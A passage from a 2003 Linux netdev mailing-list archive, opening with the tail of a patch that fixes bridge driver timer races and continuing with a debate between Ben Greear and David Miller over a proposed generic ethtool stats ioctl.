net_device *dev) +{ + struct net_bridge *br = dev->priv; + + WARN_ON(!list_empty(&br->port_list)); + WARN_ON(!list_empty(&br->age_list)); + + BUG_ON(timer_pending(&br->hello_timer)); + BUG_ON(timer_pending(&br->tcn_timer)); + BUG_ON(timer_pending(&br->topology_change_timer)); + BUG_ON(timer_pending(&br->gc_timer)); + + kfree(dev); +} void br_dev_setup(struct net_device *dev) { memset(dev->dev_addr, 0, ETH_ALEN); + ether_setup(dev); + dev->do_ioctl = br_dev_do_ioctl; dev->get_stats = br_dev_get_stats; dev->hard_start_xmit = br_dev_xmit; dev->open = br_dev_open; dev->set_multicast_list = br_dev_set_multicast_list; - dev->destructor = (void (*)(struct net_device *))kfree; + dev->destructor = br_dev_free; SET_MODULE_OWNER(dev); dev->stop = br_dev_stop; dev->accept_fastpath = br_dev_accept_fastpath; dev->tx_queue_len = 0; dev->set_mac_address = NULL; dev->priv_flags = IFF_EBRIDGE; - - ether_setup(dev); } diff -urN -X dontdiff linux-2.6.0-test1/net/bridge/br_if.c linux-2.5-bridge/net/bridge/br_if.c --- linux-2.6.0-test1/net/bridge/br_if.c 2003-07-20 19:21:47.000000000 -0400 +++ linux-2.5-bridge/net/bridge/br_if.c 2003-07-22 09:54:57.000000000 -0400 @@ -41,6 +41,13 @@ static void destroy_nbp(void *arg) { struct net_bridge_port *p = arg; + + p->dev->br_port = NULL; + + BUG_ON(timer_pending(&p->message_age_timer)); + BUG_ON(timer_pending(&p->forward_delay_timer)); + BUG_ON(timer_pending(&p->hold_timer)); + dev_put(p->dev); kfree(p); } @@ -53,16 +60,19 @@ br_stp_disable_port(p); dev_set_promiscuity(dev, -1); - dev->br_port = NULL; list_del_rcu(&p->list); br_fdb_delete_by_port(p->br, p); + del_timer(&p->message_age_timer); + del_timer(&p->forward_delay_timer); + del_timer(&p->hold_timer); + call_rcu(&p->rcu, destroy_nbp, p); } -static void del_ifs(struct net_bridge *br) +static void del_br(struct net_bridge *br) { struct list_head *p, *n; @@ -71,6 +81,10 @@ del_nbp(list_entry(p, struct net_bridge_port, list)); } spin_unlock_bh(&br->lock); + + del_timer_sync(&br->gc_timer); + + unregister_netdevice(br->dev); } static struct net_bridge *new_nb(const char *name) @@ -182,15 +196,14 @@ ret = -EBUSY; } - else { - del_ifs((struct net_bridge *) dev->priv); - unregister_netdevice(dev); - } + else + del_br(dev->priv); rtnl_unlock(); return ret; } +/* called under bridge lock */ int br_add_if(struct net_bridge *br, struct net_device *dev) { struct net_bridge_port *p; @@ -205,7 +218,6 @@ return -ELOOP; dev_hold(dev); - spin_lock_bh(&br->lock); if ((p = new_nbp(br, dev)) == NULL) { spin_unlock_bh(&br->lock); dev_put(dev); @@ -218,26 +230,21 @@ br_fdb_insert(br, p, dev->dev_addr, 1); if ((br->dev->flags & IFF_UP) && (dev->flags & IFF_UP)) br_stp_enable_port(p); - spin_unlock_bh(&br->lock); return 0; } +/* called under bridge lock */ int br_del_if(struct net_bridge *br, struct net_device *dev) { struct net_bridge_port *p; - int retval = 0; - spin_lock_bh(&br->lock); if ((p = dev->br_port) == NULL || p->br != br) - retval = -EINVAL; - else { - del_nbp(p); - br_stp_recalculate_bridge_id(br); - } - spin_unlock_bh(&br->lock); + return -EINVAL; - return retval; + del_nbp(p); + br_stp_recalculate_bridge_id(br); + return 0; } int br_get_bridge_ifindices(int *indices, int num) @@ -274,13 +281,8 @@ rtnl_lock(); for (dev = dev_base; dev; dev = nxt) { nxt = dev->next; - if (dev->priv_flags & IFF_EBRIDGE) { - pr_debug("cleanup %s\n", dev->name); - - del_ifs((struct net_bridge *) dev->priv); - - unregister_netdevice(dev); - } + if (dev->priv_flags & IFF_EBRIDGE) + del_br(dev->priv); } rtnl_unlock(); diff -urN -X dontdiff linux-2.6.0-test1/net/bridge/br_ioctl.c linux-2.5-bridge/net/bridge/br_ioctl.c --- linux-2.6.0-test1/net/bridge/br_ioctl.c 2003-07-20 19:21:47.000000000 -0400 +++ linux-2.5-bridge/net/bridge/br_ioctl.c 2003-07-21 21:33:04.000000000 -0400 @@ -59,10 +59,12 @@ if (dev == NULL) return -EINVAL; + spin_lock_bh(&br->lock); if (cmd == BRCTL_ADD_IF) ret = br_add_if(br, dev); else ret = br_del_if(br, dev); + spin_unlock_bh(&br->lock); dev_put(dev); return ret; diff -urN -X dontdiff linux-2.6.0-test1/net/bridge/br_notify.c linux-2.5-bridge/net/bridge/br_notify.c --- linux-2.6.0-test1/net/bridge/br_notify.c 2003-07-20 19:21:47.000000000 -0400 +++ linux-2.5-bridge/net/bridge/br_notify.c 2003-07-21 21:33:04.000000000 -0400 @@ -38,39 +38,27 @@ br = p->br; + spin_lock_bh(&br->lock); switch (event) { case NETDEV_CHANGEADDR: - spin_lock_bh(&br->lock); br_fdb_changeaddr(p, dev->dev_addr); br_stp_recalculate_bridge_id(br); - spin_unlock_bh(&br->lock); - break; - - case NETDEV_GOING_DOWN: - /* extend the protocol to send some kind of notification? */ break; case NETDEV_DOWN: - if (br->dev->flags & IFF_UP) { - spin_lock_bh(&br->lock); - br_stp_disable_port(p); - spin_unlock_bh(&br->lock); - } + br_stp_disable_port(p); break; case NETDEV_UP: - if (!(br->dev->flags & IFF_UP)) { - spin_lock_bh(&br->lock); - br_stp_enable_port(p); - spin_unlock_bh(&br->lock); - } + br_stp_enable_port(p); break; case NETDEV_UNREGISTER: br_del_if(br, dev); break; } + spin_unlock_bh(&br->lock); return NOTIFY_DONE; } diff -urN -X dontdiff linux-2.6.0-test1/net/bridge/br_stp_if.c linux-2.5-bridge/net/bridge/br_stp_if.c --- linux-2.6.0-test1/net/bridge/br_stp_if.c 2003-07-20 19:21:48.000000000 -0400 +++ linux-2.5-bridge/net/bridge/br_stp_if.c 2003-07-22 00:44:46.000000000 -0400 @@ -43,8 +43,7 @@ struct net_bridge_port *p; spin_lock_bh(&br->lock); - br->hello_timer.expires = jiffies + br->hello_time; - add_timer(&br->hello_timer); + mod_timer(&br->hello_timer, jiffies + br->hello_time); br_config_bpdu_generation(br); list_for_each_entry(p, &br->port_list, list) { @@ -74,8 +73,6 @@ del_timer_sync(&br->hello_timer); del_timer_sync(&br->topology_change_timer); del_timer_sync(&br->tcn_timer); - del_timer_sync(&br->gc_timer); - } /* called under bridge lock */ diff -urN -X dontdiff linux-2.6.0-test1/net/bridge/br_stp_timer.c linux-2.5-bridge/net/bridge/br_stp_timer.c --- linux-2.6.0-test1/net/bridge/br_stp_timer.c 2003-07-20 19:21:48.000000000 -0400 +++ linux-2.5-bridge/net/bridge/br_stp_timer.c 2003-07-22 10:08:46.000000000 -0400 @@ -43,8 +43,7 @@ if (br->dev->flags & IFF_UP) { br_config_bpdu_generation(br); - br->hello_timer.expires = jiffies + br->hello_time; - add_timer(&br->hello_timer); + mod_timer(&br->hello_timer, jiffies + br->hello_time); } spin_unlock_bh(&br->lock); } @@ -73,6 +72,8 @@ * check is redundant. I'm leaving it in for now, though. */ spin_lock_bh(&br->lock); + if (p->state == BR_STATE_DISABLED) + goto unlock; was_root = br_is_root_bridge(br); br_become_designated_port(p); @@ -80,6 +81,7 @@ br_port_state_selection(br); if (br_is_root_bridge(br) && !was_root) br_become_root_bridge(br); + unlock: spin_unlock_bh(&br->lock); } @@ -93,8 +95,8 @@ spin_lock_bh(&br->lock); if (p->state == BR_STATE_LISTENING) { p->state = BR_STATE_LEARNING; - p->forward_delay_timer.expires = jiffies + br->forward_delay; - add_timer(&p->forward_delay_timer); + mod_timer(&p->forward_delay_timer, + jiffies + br->forward_delay); } else if (p->state == BR_STATE_LEARNING) { p->state = BR_STATE_FORWARDING; if (br_is_designated_for_some_port(br)) @@ -113,8 +115,7 @@ if (br->dev->flags & IFF_UP) { br_transmit_tcn(br); - br->tcn_timer.expires = jiffies + br->bridge_hello_time; - add_timer(&br->tcn_timer); + mod_timer(&br->tcn_timer,jiffies + br->bridge_hello_time); } spin_unlock_bh(&br->lock); } From davem@redhat.com Tue Jul 22 20:57:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 20:57:18 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N3vEFl026984 for ; Tue, 22 Jul 2003 20:57:14 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id UAA08191; Tue, 22 Jul 2003 20:54:58 -0700 Date: Tue, 22 Jul 2003 20:54:57 -0700 From: "David S. Miller" To: Stephen Hemminger Cc: klassert@mathematik.tu-chemnitz.de, linux@mautner.ca, netdev@oss.sgi.com Subject: Re: [PATCH] Fix bridge timer race Message-Id: <20030722205457.227847c2.davem@redhat.com> In-Reply-To: <20030722234508.0af40e80.shemminger@osdl.org> References: <20030722234508.0af40e80.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4221 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 22 Jul 2003 23:45:08 -0400 Stephen Hemminger wrote: > This should fix several startup/shutdown timer races in the bridge > driver. Added some paranoia checks for dangling timers. Applied, thanks. From greearb@candelatech.com Tue Jul 22 22:06:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 22:06:16 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N56CFl030054 for ; Tue, 22 Jul 2003 22:06:13 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6N565m2009293 for ; Tue, 22 Jul 2003 22:06:07 -0700 Message-ID: <3F1E17BC.30100@candelatech.com> Date: Tue, 22 Jul 2003 22:06:04 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "'netdev@oss.sgi.com'" Subject: netdev_ops? Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4222 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Any progress towards getting the netdev_ops into 2.4? I have several patches that would benefit (in that no new ioctls would be needed) if this goes in. Thanks, Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From davem@redhat.com Tue Jul 22 22:09:56 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 22:10:02 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N59uFl030507 for ; Tue, 22 Jul 2003 22:09:56 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA08348; Tue, 22 Jul 2003 22:07:45 -0700 Date: Tue, 22 Jul 2003 22:07:45 -0700 From: "David S. Miller" To: Ben Greear Cc: netdev@oss.sgi.com Subject: Re: netdev_ops? Message-Id: <20030722220745.379a73c6.davem@redhat.com> In-Reply-To: <3F1E17BC.30100@candelatech.com> References: <3F1E17BC.30100@candelatech.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4223 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 22 Jul 2003 22:06:04 -0700 Ben Greear wrote: > Any progress towards getting the netdev_ops into 2.4? > > I have several patches that would benefit (in that no new ioctls > would be needed) if this goes in. If anything, it's going to go into 2.6.x first, and then backported to 2.4.x after it's had a few months of testing and tweaking. From greearb@candelatech.com Tue Jul 22 22:30:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 22:30:35 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N5UGFl032353 for ; Tue, 22 Jul 2003 22:30:16 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6N5UAm2012293; Tue, 22 Jul 2003 22:30:11 -0700 Message-ID: <3F1E1D62.90009@candelatech.com> Date: Tue, 22 Jul 2003 22:30:10 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" CC: netdev@oss.sgi.com Subject: Re: netdev_ops? References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> In-Reply-To: <20030722220745.379a73c6.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4224 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev David S. Miller wrote: > On Tue, 22 Jul 2003 22:06:04 -0700 > Ben Greear wrote: > > >>Any progress towards getting the netdev_ops into 2.4? >> >>I have several patches that would benefit (in that no new ioctls >>would be needed) if this goes in. > > > If anything, it's going to go into 2.6.x first, and then backported > to 2.4.x after it's had a few months of testing and tweaking. > Any interest in a lower-risk netdev-ops lite? I have a relatively ugly little patch that will allow me to handle certain ETHTOOL ioctls in dev.c's ioctl handling code. Ugly, but short, and very little chance of breaking anything else.... -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From davem@redhat.com Tue Jul 22 23:04:27 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 23:04:31 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N64RFl002259 for ; Tue, 22 Jul 2003 23:04:27 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id XAA08407; Tue, 22 Jul 2003 23:02:16 -0700 Date: Tue, 22 Jul 2003 23:02:15 -0700 From: "David S. Miller" To: Ben Greear Cc: netdev@oss.sgi.com Subject: Re: netdev_ops? Message-Id: <20030722230215.284dd270.davem@redhat.com> In-Reply-To: <3F1E1D62.90009@candelatech.com> References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> <3F1E1D62.90009@candelatech.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4225 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 22 Jul 2003 22:30:10 -0700 Ben Greear wrote: > Any interest in a lower-risk netdev-ops lite? Not really. Nobody is really helped with this, not even you. It makes almost no sense to make a driver only work with a 2.4.x kernel that has this netdev-ops-lite thing patched into it, because then it doesn't work on all the bazillion other 2.4.x kernels out there. From greearb@candelatech.com Tue Jul 22 23:24:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 23:24:13 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N6O6Fl003678 for ; Tue, 22 Jul 2003 23:24:06 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6N6O0m2019364; Tue, 22 Jul 2003 23:24:00 -0700 Message-ID: <3F1E2A00.5080506@candelatech.com> Date: Tue, 22 Jul 2003 23:24:00 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" CC: netdev@oss.sgi.com Subject: Re: netdev_ops? References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> <3F1E1D62.90009@candelatech.com> <20030722230215.284dd270.davem@redhat.com> In-Reply-To: <20030722230215.284dd270.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4226 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev David S. Miller wrote: > On Tue, 22 Jul 2003 22:30:10 -0700 > Ben Greear wrote: > > >>Any interest in a lower-risk netdev-ops lite? > > > Not really. > > Nobody is really helped with this, not even you. It makes almost no > sense to make a driver only work with a 2.4.x kernel that has this > netdev-ops-lite thing patched into it, because then it doesn't work on > all the bazillion other 2.4.x kernels out there. My goal is a place to add new generic net-device ioctls without having to worry about testing the ioctls on various platforms (You've said before you don't like when I try to add new ioctls because I break SPARC and who knows what else...) My patch looks like this, and it has zero impact on drivers. It's primary benefit is to get around adding more ioctls: ### Line 2304 or so, default case of the dev_ifsioc switch... ### default: + /* Handle some generic ethtool commands here */ + if (cmd == SIOCETHTOOL) { + u32 cmd = 0; + if (copy_from_user(&cmd, ifr->ifr_data, sizeof(cmd))) { + return -EFAULT; + } + + if (cmd == ETHTOOL_GNDSTATS) { + + struct ethtool_ndstats* nds = (struct ethtool_ndstats*)(ifr->ifr_data); + + /* Get net-device stats struct, will save it in the space + * passed in to us in ifr->ifr_data. Would like to use + * ethtool, but it seems to require specific driver support, + * when this is a general purpose netdevice request... + */ + struct net_device_stats *stats = dev->get_stats(dev); + if (stats) { + if (copy_to_user(nds->data, stats, sizeof(*stats))) { + return -EFAULT; + } + } + else { + return -EOPNOTSUPP; + } + return 0; + } + } + + + ### Fall through to the rest of the ioctl (ethtool included) handling... -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From davem@redhat.com Tue Jul 22 23:29:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 23:29:35 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N6TVFl004281 for ; Tue, 22 Jul 2003 23:29:31 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id XAA08537; Tue, 22 Jul 2003 23:27:19 -0700 Date: Tue, 22 Jul 2003 23:27:19 -0700 From: "David S. Miller" To: Ben Greear Cc: netdev@oss.sgi.com Subject: Re: netdev_ops? Message-Id: <20030722232719.216d7823.davem@redhat.com> In-Reply-To: <3F1E2A00.5080506@candelatech.com> References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> <3F1E1D62.90009@candelatech.com> <20030722230215.284dd270.davem@redhat.com> <3F1E2A00.5080506@candelatech.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4227 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 22 Jul 2003 23:24:00 -0700 Ben Greear wrote: > My goal is a place to add new generic net-device ioctls without having > to worry about testing the ioctls on various platforms Your patch adds ethtool stuff, which works perfectly fine on all platforms, even sparc64 when executing 32-bit binaries. Just add it to your drivers if you want them supported in 2.4.x > (You've said > before you don't like when I try to add new ioctls because I break SPARC and > who knows what else...) You're not adding new ioctls here, you adding a default implementation of an existing ioctl, and this kind of code is of no issue wrt SPARC/PPC/MIPS/etc. ioctl translation for 32-bit applications running on a 64-bit kernel. > My patch looks like this, and it has zero impact on drivers. It's primary > benefit is to get around adding more ioctls: You gain nothing from this patch, just put it into your drivers. Your patch is even more useless than I thought it was going to be. :-) From greearb@candelatech.com Tue Jul 22 23:36:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 23:36:39 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N6aVFl004972 for ; Tue, 22 Jul 2003 23:36:31 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6N6aPm2020944; Tue, 22 Jul 2003 23:36:25 -0700 Message-ID: <3F1E2CE9.2080404@candelatech.com> Date: Tue, 22 Jul 2003 23:36:25 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" CC: netdev@oss.sgi.com Subject: Re: netdev_ops? References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> <3F1E1D62.90009@candelatech.com> <20030722230215.284dd270.davem@redhat.com> <3F1E2A00.5080506@candelatech.com> <20030722232719.216d7823.davem@redhat.com> In-Reply-To: <20030722232719.216d7823.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4228 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev David S. Miller wrote: > You gain nothing from this patch, just put it into your drivers. I am not writing drivers, I'm trying to write code that works with everything that looks remotely like an ethernet device. Thus, I can make this one change and work with ALL drivers, and not have to corrupt every friggin driver under the sun. And yes, I realize this patch is not adding a new ioctl..that is the whole point. > > Your patch is even more useless than I thought it was going to > be. :-) I really hope you mis-understood it :) Note it allows me to get a binary representation of the net_device_stats w/out having to parse /proc/net/dev or figure out the vast complexity of libnetlink. I have plenty of other things that are currently new ioctls that could be handled the same, and thus I could continue to avoid issues with other platforms. Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From davem@redhat.com Tue Jul 22 23:40:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 23:40:15 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N6eBFl005500 for ; Tue, 22 Jul 2003 23:40:12 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id XAA08608; Tue, 22 Jul 2003 23:37:58 -0700 Date: Tue, 22 Jul 2003 23:37:57 -0700 From: "David S. Miller" To: Patrick McHardy Cc: netdev@oss.sgi.com Subject: Re: [PATCH]: fix no_cong_thresh sysctl Message-Id: <20030722233757.1780042d.davem@redhat.com> In-Reply-To: <3F1D59B4.3080307@trash.net> References: <3F1D59B4.3080307@trash.net> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4229 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 22 Jul 2003 17:35:16 +0200 Patrick McHardy wrote: > these two patches fix the net.core.no_cong_thresh sysctl, the value > accessed is in fact no_cong. Applied, thanks a lot Patrick. From davem@redhat.com Wed Jul 23 00:03:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 00:04:00 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N73oFl008686 for ; Wed, 23 Jul 2003 00:03:53 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id AAA08737; Wed, 23 Jul 2003 00:01:34 -0700 Date: Wed, 23 Jul 2003 00:01:30 -0700 From: "David S. Miller" To: Ben Greear Cc: netdev@oss.sgi.com Subject: Re: netdev_ops? Message-Id: <20030723000130.3a6a917e.davem@redhat.com> In-Reply-To: <3F1E2CE9.2080404@candelatech.com> References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> <3F1E1D62.90009@candelatech.com> <20030722230215.284dd270.davem@redhat.com> <3F1E2A00.5080506@candelatech.com> <20030722232719.216d7823.davem@redhat.com> <3F1E2CE9.2080404@candelatech.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4230 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 22 Jul 2003 23:36:25 -0700 Ben Greear wrote: > I am not writing drivers, I'm trying to write code that works with > everything that looks remotely like an ethernet device. Making ethtool interfaces available on every net device is not right, what about the ISDN folks? What if they specifically want ethtool ioctls to fail for their devices? How can one accomplish that after your changes? Answer: You can't. > I can make this one change and work with ALL drivers, and not have > to corrupt every friggin driver under the sun. This is undesirable. Not all network drivers should implement ethtool. A certain family of network devices may not want them, and we must provide for this. I don't like your change just as much as I did previously. > Note it allows me to get a binary representation of the net_device_stats > w/out having to parse /proc/net/dev or figure out the vast complexity > of libnetlink. Whatever tools you write which depend upon this will not work on any existing 2.4.x kernel, therefore making their utility basically NIL. > I have plenty of other things that are currently new ioctls that could > be handled the same, and thus I could continue to avoid issues with > other platforms. What is this "other platform" issue? If you add anything new, along the lines of SIOCDEVETHTOOl, it's going to have to go through an entire full review process and in that review process any necessary 32-bit ioctl translation code would get added. From greearb@candelatech.com Wed Jul 23 00:28:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 00:28:45 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N7SXFl010546 for ; Wed, 23 Jul 2003 00:28:33 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6N7SRm2027727; Wed, 23 Jul 2003 00:28:28 -0700 Message-ID: <3F1E391B.80209@candelatech.com> Date: Wed, 23 Jul 2003 00:28:27 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" CC: netdev@oss.sgi.com Subject: Re: netdev_ops? References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> <3F1E1D62.90009@candelatech.com> <20030722230215.284dd270.davem@redhat.com> <3F1E2A00.5080506@candelatech.com> <20030722232719.216d7823.davem@redhat.com> <3F1E2CE9.2080404@candelatech.com> <20030723000130.3a6a917e.davem@redhat.com> In-Reply-To: <20030723000130.3a6a917e.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4231 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev David S. Miller wrote: > On Tue, 22 Jul 2003 23:36:25 -0700 > Ben Greear wrote: > > >>I am not writing drivers, I'm trying to write code that works with >>everything that looks remotely like an ethernet device. > > > Making ethtool interfaces available on every net device is not right, > what about the ISDN folks? What if they specifically want ethtool > ioctls to fail for their devices? How can one accomplish that after > your changes? > > Answer: You can't. In my case, if the net_device can return net_device_stats, then I want it to work. If it can't, -ENOTSUPP is returned. I cannot fathom a reason for this in itself to harm anyone. As you noticed below, existing code would never try this ioctl, and new code can likewise ignore it if it cannot handle the consequences. > Whatever tools you write which depend upon this will not work > on any existing 2.4.x kernel, therefore making their utility > basically NIL. That can be said for every new feature or ioctl. Of course it won't work with older stuff...but it will work with newer stuff, and I'm smart enough to be able to fall back to the less efficient parsing of /proc/net/dev if the ioctls are not supported. Anyone 